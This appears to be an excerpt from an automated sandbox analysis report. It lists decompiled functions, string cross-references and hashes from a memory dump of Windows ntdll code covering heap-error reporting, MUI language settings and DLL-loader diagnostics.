                                                                          • The instruction at %p tried to %s , xrefs: 016EB4B6
                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 016EB39B
                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 016EB2F3
                                                                          • *** Inpage error in %ws:%s, xrefs: 016EB418
                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 016EB47D
                                                                          • *** enter .exr %p for the exception record, xrefs: 016EB4F1
                                                                          • Go determine why that thread has not released the critical section., xrefs: 016EB3C5
                                                                          • This failed because of error %Ix., xrefs: 016EB446
                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 016EB476
                                                                          • a NULL pointer, xrefs: 016EB4E0
                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 016EB48F
                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 016EB484
                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 016EB314
                                                                          • write to, xrefs: 016EB4A6
                                                                          • read from, xrefs: 016EB4AD, 016EB4B2
                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 016EB2DC
                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016EB38F
                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 016EB53F
                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 016EB352
                                                                          • *** then kb to get the faulting stack, xrefs: 016EB51C
                                                                          • *** enter .cxr %p for the context, xrefs: 016EB50D
                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 016EB305
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • API String ID: 0-108210295
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 44%
                                                                          			E016F1C06() {
                                                                          				signed int _t27;
                                                                          				char* _t104;
                                                                          				char* _t105;
                                                                          				intOrPtr _t113;
                                                                          				intOrPtr _t115;
                                                                          				intOrPtr _t117;
                                                                          				intOrPtr _t119;
                                                                          				intOrPtr _t120;
                                                                          
                                                                          				_t105 = 0x16148a4;
                                                                          				_t104 = "HEAP: ";
                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                          					_push(_t104);
                                                                          					E0163B150();
                                                                          				} else {
                                                                          					E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                          				}
                                                                          				_push( *0x172589c);
                                                                          				E0163B150("Heap error detected at %p (heap handle %p)\n",  *0x17258a0);
                                                                          				_t27 =  *0x1725898; // 0x0
                                                                          				if(_t27 <= 0xf) {
                                                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M016F1E96))) {
                                                                          						case 0:
                                                                          							_t105 = "heap_failure_internal";
                                                                          							goto L21;
                                                                          						case 1:
                                                                          							goto L21;
                                                                          						case 2:
                                                                          							goto L21;
                                                                          						case 3:
                                                                          							goto L21;
                                                                          						case 4:
                                                                          							goto L21;
                                                                          						case 5:
                                                                          							goto L21;
                                                                          						case 6:
                                                                          							goto L21;
                                                                          						case 7:
                                                                          							goto L21;
                                                                          						case 8:
                                                                          							goto L21;
                                                                          						case 9:
                                                                          							goto L21;
                                                                          						case 0xa:
                                                                          							goto L21;
                                                                          						case 0xb:
                                                                          							goto L21;
                                                                          						case 0xc:
                                                                          							goto L21;
                                                                          						case 0xd:
                                                                          							goto L21;
                                                                          						case 0xe:
                                                                          							goto L21;
                                                                          						case 0xf:
                                                                          							goto L21;
                                                                          					}
                                                                          				}
                                                                          				L21:
                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                          					_push(_t104);
                                                                          					E0163B150();
                                                                          				} else {
                                                                          					E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                          				}
                                                                          				_push(_t105);
                                                                          				E0163B150("Error code: %d - %s\n",  *0x1725898);
                                                                          				_t113 =  *0x17258a4; // 0x0
                                                                          				if(_t113 != 0) {
                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                          						_push(_t104);
                                                                          						E0163B150();
                                                                          					} else {
                                                                          						E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                          					}
                                                                          					E0163B150("Parameter1: %p\n",  *0x17258a4);
                                                                          				}
                                                                          				_t115 =  *0x17258a8; // 0x0
                                                                          				if(_t115 != 0) {
                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                          						_push(_t104);
                                                                          						E0163B150();
                                                                          					} else {
                                                                          						E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                          					}
                                                                          					E0163B150("Parameter2: %p\n",  *0x17258a8);
                                                                          				}
                                                                          				_t117 =  *0x17258ac; // 0x0
                                                                          				if(_t117 != 0) {
                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                          						_push(_t104);
                                                                          						E0163B150();
                                                                          					} else {
                                                                          						E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                          					}
                                                                          					E0163B150("Parameter3: %p\n",  *0x17258ac);
                                                                          				}
                                                                          				_t119 =  *0x17258b0; // 0x0
                                                                          				if(_t119 != 0) {
                                                                          					L41:
                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                          						_push(_t104);
                                                                          						E0163B150();
                                                                          					} else {
                                                                          						E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                          					}
                                                                          					_push( *0x17258b4);
                                                                          					E0163B150("Last known valid blocks: before - %p, after - %p\n",  *0x17258b0);
                                                                          				} else {
                                                                          					_t120 =  *0x17258b4; // 0x0
                                                                          					if(_t120 != 0) {
                                                                          						goto L41;
                                                                          					}
                                                                          				}
                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                          					_push(_t104);
                                                                          					E0163B150();
                                                                          				} else {
                                                                          					E0163B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                          				}
                                                                          				return E0163B150("Stack trace available at %p\n", 0x17258c0);
                                                                          			}












                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                          • API String ID: 0-2897834094
                                                                          • Opcode ID: ddf83d2f564729963f1ef73c6690287f020af97b8eab143eac0fbed7f6b31fc2
                                                                          • Instruction ID: e28e5d222f2a4c28f605e5c494434ea5759aaf9245e23d4d5d69706f05b2bef1
                                                                          • Opcode Fuzzy Hash: ddf83d2f564729963f1ef73c6690287f020af97b8eab143eac0fbed7f6b31fc2
                                                                          • Instruction Fuzzy Hash: 92611337591565DFC221AF89DC84E3573A6EB05A71B09807FFB0A6B340D6B998428F0E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E01643D34(signed int* __ecx) {
                                                                          				signed int* _v8;
                                                                          				char _v12;
                                                                          				signed int* _v16;
                                                                          				signed int* _v20;
                                                                          				char _v24;
                                                                          				signed int _v28;
                                                                          				signed int _v32;
                                                                          				char _v36;
                                                                          				signed int _v40;
                                                                          				signed int _v44;
                                                                          				signed int* _v48;
                                                                          				signed int* _v52;
                                                                          				signed int _v56;
                                                                          				signed int _v60;
                                                                          				char _v68;
                                                                          				signed int _t140;
                                                                          				signed int _t161;
                                                                          				signed int* _t236;
                                                                          				signed int* _t242;
                                                                          				signed int* _t243;
                                                                          				signed int* _t244;
                                                                          				signed int* _t245;
                                                                          				signed int _t255;
                                                                          				void* _t257;
                                                                          				signed int _t260;
                                                                          				void* _t262;
                                                                          				signed int _t264;
                                                                          				void* _t267;
                                                                          				signed int _t275;
                                                                          				signed int* _t276;
                                                                          				short* _t277;
                                                                          				signed int* _t278;
                                                                          				signed int* _t279;
                                                                          				signed int* _t280;
                                                                          				short* _t281;
                                                                          				signed int* _t282;
                                                                          				short* _t283;
                                                                          				signed int* _t284;
                                                                          				void* _t285;
                                                                          
                                                                          				_v60 = _v60 | 0xffffffff;
                                                                          				_t280 = 0;
                                                                          				_t242 = __ecx;
                                                                          				_v52 = __ecx;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				_v40 = 0;
                                                                          				_v28 = 0;
                                                                          				_v32 = 0;
                                                                          				_v44 = 0;
                                                                          				_v56 = 0;
                                                                          				_t275 = 0;
                                                                          				_v16 = 0;
                                                                          				if(__ecx == 0) {
                                                                          					_t280 = 0xc000000d;
                                                                          					_t140 = 0;
                                                                          					L50:
                                                                          					 *_t242 =  *_t242 | 0x00000800;
                                                                          					_t242[0x13] = _t140;
                                                                          					_t242[0x16] = _v40;
                                                                          					_t242[0x18] = _v28;
                                                                          					_t242[0x14] = _v32;
                                                                          					_t242[0x17] = _t275;
                                                                          					_t242[0x15] = _v44;
                                                                          					_t242[0x11] = _v56;
                                                                          					_t242[0x12] = _v60;
                                                                          					return _t280;
                                                                          				}
                                                                          				if(E01641B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                          					_v56 = 1;
                                                                          					if(_v8 != 0) {
                                                                          						L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                          					}
                                                                          					_v8 = _t280;
                                                                          				}
                                                                          				if(E01641B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                          					_v60 =  *_v8;
                                                                          					L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                          					_v8 = _t280;
                                                                          				}
                                                                          				if(E01641B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                          					L16:
                                                                          					if(E01641B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                          						L28:
                                                                          						if(E01641B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                          							L46:
                                                                          							_t275 = _v16;
                                                                          							L47:
                                                                          							_t161 = 0;
                                                                          							L48:
                                                                          							if(_v8 != 0) {
                                                                          								L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                          							}
                                                                          							_t140 = _v20;
                                                                          							if(_t140 != 0) {
                                                                          								if(_t275 != 0) {
                                                                          									L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                          									_t275 = 0;
                                                                          									_v28 = 0;
                                                                          									_t140 = _v20;
                                                                          								}
                                                                          							}
                                                                          							goto L50;
                                                                          						}
                                                                          						_t167 = _v12;
                                                                          						_t255 = _v12 + 4;
                                                                          						_v44 = _t255;
                                                                          						if(_t255 == 0) {
                                                                          							_t276 = _t280;
                                                                          							_v32 = _t280;
                                                                          						} else {
                                                                          							_t276 = L01654620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                          							_t167 = _v12;
                                                                          							_v32 = _t276;
                                                                          						}
                                                                          						if(_t276 == 0) {
                                                                          							_v44 = _t280;
                                                                          							_t280 = 0xc0000017;
                                                                          							goto L46;
                                                                          						} else {
                                                                          							E0167F3E0(_t276, _v8, _t167);
                                                                          							_v48 = _t276;
                                                                          							_t277 = E01681370(_t276, 0x1614e90);
                                                                          							_pop(_t257);
                                                                          							if(_t277 == 0) {
                                                                          								L38:
                                                                          								_t170 = _v48;
                                                                          								if( *_v48 != 0) {
                                                                          									E0167BB40(0,  &_v68, _t170);
                                                                          									if(L016443C0( &_v68,  &_v24) != 0) {
                                                                          										_t280 =  &(_t280[0]);
                                                                          									}
                                                                          								}
                                                                          								if(_t280 == 0) {
                                                                          									_t280 = 0;
                                                                          									L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                          									_v44 = 0;
                                                                          									_v32 = 0;
                                                                          								} else {
                                                                          									_t280 = 0;
                                                                          								}
                                                                          								_t174 = _v8;
                                                                          								if(_v8 != 0) {
                                                                          									L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                          								}
                                                                          								_v8 = _t280;
                                                                          								goto L46;
                                                                          							}
                                                                          							_t243 = _v48;
                                                                          							do {
                                                                          								 *_t277 = 0;
                                                                          								_t278 = _t277 + 2;
                                                                          								E0167BB40(_t257,  &_v68, _t243);
                                                                          								if(L016443C0( &_v68,  &_v24) != 0) {
                                                                          									_t280 =  &(_t280[0]);
                                                                          								}
                                                                          								_t243 = _t278;
                                                                          								_t277 = E01681370(_t278, 0x1614e90);
                                                                          								_pop(_t257);
                                                                          							} while (_t277 != 0);
                                                                          							_v48 = _t243;
                                                                          							_t242 = _v52;
                                                                          							goto L38;
                                                                          						}
                                                                          					}
                                                                          					_t191 = _v12;
                                                                          					_t260 = _v12 + 4;
                                                                          					_v28 = _t260;
                                                                          					if(_t260 == 0) {
                                                                          						_t275 = _t280;
                                                                          						_v16 = _t280;
                                                                          					} else {
                                                                          						_t275 = L01654620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                          						_t191 = _v12;
                                                                          						_v16 = _t275;
                                                                          					}
                                                                          					if(_t275 == 0) {
                                                                          						_v28 = _t280;
                                                                          						_t280 = 0xc0000017;
                                                                          						goto L47;
                                                                          					} else {
                                                                          						E0167F3E0(_t275, _v8, _t191);
                                                                          						_t285 = _t285 + 0xc;
                                                                          						_v48 = _t275;
                                                                          						_t279 = _t280;
                                                                          						_t281 = E01681370(_v16, 0x1614e90);
                                                                          						_pop(_t262);
                                                                          						if(_t281 != 0) {
                                                                          							_t244 = _v48;
                                                                          							do {
                                                                          								 *_t281 = 0;
                                                                          								_t282 = _t281 + 2;
                                                                          								E0167BB40(_t262,  &_v68, _t244);
                                                                          								if(L016443C0( &_v68,  &_v24) != 0) {
                                                                          									_t279 =  &(_t279[0]);
                                                                          								}
                                                                          								_t244 = _t282;
                                                                          								_t281 = E01681370(_t282, 0x1614e90);
                                                                          								_pop(_t262);
                                                                          							} while (_t281 != 0);
                                                                          							_v48 = _t244;
                                                                          							_t242 = _v52;
                                                                          						}
                                                                          						_t201 = _v48;
                                                                          						_t280 = 0;
                                                                          						if( *_v48 != 0) {
                                                                          							E0167BB40(_t262,  &_v68, _t201);
                                                                          							if(L016443C0( &_v68,  &_v24) != 0) {
                                                                          								_t279 =  &(_t279[0]);
                                                                          							}
                                                                          						}
                                                                          						if(_t279 == 0) {
                                                                          							L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                          							_v28 = _t280;
                                                                          							_v16 = _t280;
                                                                          						}
                                                                          						_t202 = _v8;
                                                                          						if(_v8 != 0) {
                                                                          							L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                          						}
                                                                          						_v8 = _t280;
                                                                          						goto L28;
                                                                          					}
                                                                          				}
                                                                          				_t214 = _v12;
                                                                          				_t264 = _v12 + 4;
                                                                          				_v40 = _t264;
                                                                          				if(_t264 == 0) {
                                                                          					_v20 = _t280;
                                                                          				} else {
                                                                          					_t236 = L01654620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                          					_t280 = _t236;
                                                                          					_v20 = _t236;
                                                                          					_t214 = _v12;
                                                                          				}
                                                                          				if(_t280 == 0) {
                                                                          					_t161 = 0;
                                                                          					_t280 = 0xc0000017;
                                                                          					_v40 = 0;
                                                                          					goto L48;
                                                                          				} else {
                                                                          					E0167F3E0(_t280, _v8, _t214);
                                                                          					_t285 = _t285 + 0xc;
                                                                          					_v48 = _t280;
                                                                          					_t283 = E01681370(_t280, 0x1614e90);
                                                                          					_pop(_t267);
                                                                          					if(_t283 != 0) {
                                                                          						_t245 = _v48;
                                                                          						do {
                                                                          							 *_t283 = 0;
                                                                          							_t284 = _t283 + 2;
                                                                          							E0167BB40(_t267,  &_v68, _t245);
                                                                          							if(L016443C0( &_v68,  &_v24) != 0) {
                                                                          								_t275 = _t275 + 1;
                                                                          							}
                                                                          							_t245 = _t284;
                                                                          							_t283 = E01681370(_t284, 0x1614e90);
                                                                          							_pop(_t267);
                                                                          						} while (_t283 != 0);
                                                                          						_v48 = _t245;
                                                                          						_t242 = _v52;
                                                                          					}
                                                                          					_t224 = _v48;
                                                                          					_t280 = 0;
                                                                          					if( *_v48 != 0) {
                                                                          						E0167BB40(_t267,  &_v68, _t224);
                                                                          						if(L016443C0( &_v68,  &_v24) != 0) {
                                                                          							_t275 = _t275 + 1;
                                                                          						}
                                                                          					}
                                                                          					if(_t275 == 0) {
                                                                          						L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                          						_v40 = _t280;
                                                                          						_v20 = _t280;
                                                                          					}
                                                                          					_t225 = _v8;
                                                                          					if(_v8 != 0) {
                                                                          						L016577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                          					}
                                                                          					_v8 = _t280;
                                                                          					goto L16;
                                                                          				}
                                                                          			}











































                                                                          Strings
                                                                          • Kernel-MUI-Language-SKU, xrefs: 01643F70
                                                                          • Kernel-MUI-Number-Allowed, xrefs: 01643D8C
                                                                          • WindowsExcludedProcs, xrefs: 01643D6F
                                                                          • Kernel-MUI-Language-Allowed, xrefs: 01643DC0
                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 01643E97
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                          • API String ID: 0-258546922
                                                                          • Opcode ID: 06054f1b28c66ac0c968acf0cfba78075070af626aa6f28a3055f73f959d0fb9
                                                                          • Instruction ID: cbf1276fd02743537dbf13c46622d1b9cca971edec6a2afcf680a54e826d12da
                                                                          • Opcode Fuzzy Hash: 06054f1b28c66ac0c968acf0cfba78075070af626aa6f28a3055f73f959d0fb9
                                                                          • Instruction Fuzzy Hash: 42F12B72D00619EBCB11DF98CD80AEEBBBDFF59A50F14406AE905A7350DB349E01CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 016A933B, 016A9367
                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 016A9357
                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 016A932A
                                                                          • LdrpFindDllActivationContext, xrefs: 016A9331, 016A935D
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 0-3779518884
                                                                          • Opcode ID: cbf5114b1f8a363669535d2034be94024b3f2fb1614c99c49d484c1d0a732ddc
                                                                          • Instruction ID: cd05d7eaca7515f34b7bf3303ec492bfb2d612f43a51a80ece3d2ac8b6165570
                                                                          • Opcode Fuzzy Hash: cbf5114b1f8a363669535d2034be94024b3f2fb1614c99c49d484c1d0a732ddc
                                                                          • Instruction Fuzzy Hash: 22411A32A403159FDB36AF3DCC49A75BABDAB40358F09816DEA0557252E770ADC1C781
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01699C28
                                                                          • LdrpDoPostSnapWork, xrefs: 01699C1E
                                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01699C18
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 2994545307-1948996284
                                                                          • Opcode ID: b3832b09dfb1a7b0783362866f9f50780608c65ca1f88a032da9c52419c3714c
                                                                          • Instruction ID: 4dac3571be6d00f0d5b04ec8f1ec2fededea9de5d9171ee54a337df9600b7005
                                                                          • Opcode Fuzzy Hash: b3832b09dfb1a7b0783362866f9f50780608c65ca1f88a032da9c52419c3714c
                                                                          • Instruction Fuzzy Hash: 0591E071A00216DFEF29DF9DDC81ABAB7BAFF54314B05416DEA05AB241E730E941CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01699891
                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 016998A2
                                                                          • LdrpCompleteMapModule, xrefs: 01699898
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                          • API String ID: 0-1676968949
                                                                          • Opcode ID: 6861edd4a767c362a895723ddb5c529dbc1d6714b563560ecb7ddf1c43327712
                                                                          • Instruction ID: 03b03c644053a8cb51d00aec61baea6e81955a71577a8e7db62b5b1bab2c6895
                                                                          • Opcode Fuzzy Hash: 6861edd4a767c362a895723ddb5c529dbc1d6714b563560ecb7ddf1c43327712
                                                                          • Instruction Fuzzy Hash: 5A51DF316007469BEB32CB6CCD44B6ABBE9EB44314F1406ADE9529B7D1D734ED02CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • InstallLanguageFallback, xrefs: 0163E6DB
                                                                          • @, xrefs: 0163E6C0
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0163E68C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                          • API String ID: 0-1757540487
                                                                          • Opcode ID: c18a8d87af842cc25fab677297327d6aea8ab70e4a0b79cd59e384a0cf2039bd
                                                                          • Instruction ID: 9aefa5a6916f15888bec46f8ae6a56369901f4f5b6770367a4dc4885afa30389
                                                                          • Opcode Fuzzy Hash: c18a8d87af842cc25fab677297327d6aea8ab70e4a0b79cd59e384a0cf2039bd
                                                                          • Instruction Fuzzy Hash: B451A0725053069BDB12DF68CC50A7BB7E9AF88B54F04092EF986D7340EB34D904C7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$`
                                                                          • API String ID: 0-197956300
                                                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                          • Instruction ID: 2dc4219b6ee9ca04ecf2366f0fe7d7f8a81315ddb593a615fd7f903ebdd5df9e
                                                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                          • Instruction Fuzzy Hash: 1C9180312043429FE724CE69CC45B2BBBE6AF84714F15892DF795CB290E776E904CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          • API String ID: 2994545307-634100481
                                                                          • Opcode ID: fdd1707ea4cec952db69e74d8ed1dec9807d3538b954fd1632c067dab15433fa
                                                                          • Instruction ID: 276d15291811980d3c4b9720d91350d3aa3ccef3f61f21cc779a1e293e8e05c2
                                                                          • Opcode Fuzzy Hash: fdd1707ea4cec952db69e74d8ed1dec9807d3538b954fd1632c067dab15433fa
                                                                          • Instruction Fuzzy Hash: 1A516C71A017099FDB24DFA88D80AEEBBF9BB48700F14406DE64AEB351E7719981CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: _vswprintf_s
                                                                          • String ID:
                                                                          • API String ID: 677850445-0
                                                                          • Opcode ID: 97684b3cbb91048f6862654e48dde023df496e5bab61546d7b81a831b0d39e9a
                                                                          • Instruction ID: 48c42f2c33f76effb696d721819d8c74b4745594eb96fcb7cb46623ce83b92f6
                                                                          • Opcode Fuzzy Hash: 97684b3cbb91048f6862654e48dde023df496e5bab61546d7b81a831b0d39e9a
                                                                          • Instruction Fuzzy Hash: 5151CF71D002598BEF31CF68CE44BBEBBB5AF00714F1142ADD859AB382DB708942CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0165B9A5
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID:
                                                                          • API String ID: 885266447-0
                                                                          • Opcode ID: a8e5ca369c3b4c92dce257418063e64dba697aabfd07e7b79251ad0c79164dd4
                                                                          • Instruction ID: e5e584598b99d5f769de37a8c178b36cc141f0c5f29181aa059872e1c2742a69
                                                                          • Opcode Fuzzy Hash: a8e5ca369c3b4c92dce257418063e64dba697aabfd07e7b79251ad0c79164dd4
                                                                          • Instruction Fuzzy Hash: DE515771A08341CFC761CF2CC88092ABBF6FB88610F54896EFA8587355DB71E845CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: PATH
                                                                          • API String ID: 0-1036084923
                                                                          • Opcode ID: 05cb9f11c451cbf2f77ff448a1596b49788caa557f8b1efd3d2f17596eea10c5
                                                                          • Instruction ID: 1ded2fe8cd84c39dc4b4a8f37202981e78de9ee5e4e9bbd4eb74b0714b636495
                                                                          • Opcode Fuzzy Hash: 05cb9f11c451cbf2f77ff448a1596b49788caa557f8b1efd3d2f17596eea10c5
                                                                          • Instruction Fuzzy Hash: 13C16EB1E002199BDB25DF99DCA0ABDBBB5FF58750F44802DE901AB350D738AD42CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 016ABE0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                          • API String ID: 0-865735534
                                                                          • Opcode ID: 71ef9f47c5c3c8ef473c87d46de5459a0b939f6c58cb35f38592e34ced237942
                                                                          • Instruction ID: 3e52a19ac064ab668b08ee9b337e498258f50bbe1b9acc58f7bf80810b22afed
                                                                          • Opcode Fuzzy Hash: 71ef9f47c5c3c8ef473c87d46de5459a0b939f6c58cb35f38592e34ced237942
